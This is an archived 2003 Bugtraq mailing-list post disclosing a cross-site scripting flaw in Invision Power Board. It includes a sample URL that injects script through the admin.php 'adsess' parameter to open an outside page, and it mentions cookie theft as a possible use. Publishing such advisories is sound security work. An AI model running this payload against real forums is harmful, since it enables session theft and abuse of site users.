[31086] in bugtraq


home	help	back	first	fref	pref	prev	next	nref	lref	last	post

bug in Invision Power Board

daemon@ATHENA.MIT.EDU (Boy Bear)
Sat Aug 9 13:21:21 2003

Date: 9 Aug 2003 08:21:31 -0000
Message-ID: <20030809082131.25004.qmail@www.securityfocus.com>
Content-Type: text/plain
Content-Disposition: inline
Content-Transfer-Encoding: binary
MIME-Version: 1.0
From: Boy Bear <eyal067@walla.co.il>
To: bugtraq@securityfocus.com



I found possibility to run Script (java Script, VBScript) on the system 
Invision Power Board...
It's possible to do if it much {many} things like a withdrawal of cookie, 
advertising ....


For example:

http://forums.invisionpower.com/admin.php?adsess='>&lt;script&gt;window.open
(window.location.search.substring
(78));&lt;/script&gt;<http://binaryvision.tech.nu?BoyBear$$$From$$$BinaryVision





BoyBear From BinaryVision ( http://binaryvision.tech.nu )


home	help	back	first	fref	pref	prev	next	nref	lref	last	post

[31086] in bugtraq

bug in Invision Power Board

daemon@ATHENA.MIT.EDU (Boy Bear)Sat Aug 9 13:21:21 2003

daemon@ATHENA.MIT.EDU (Boy Bear)
Sat Aug 9 13:21:21 2003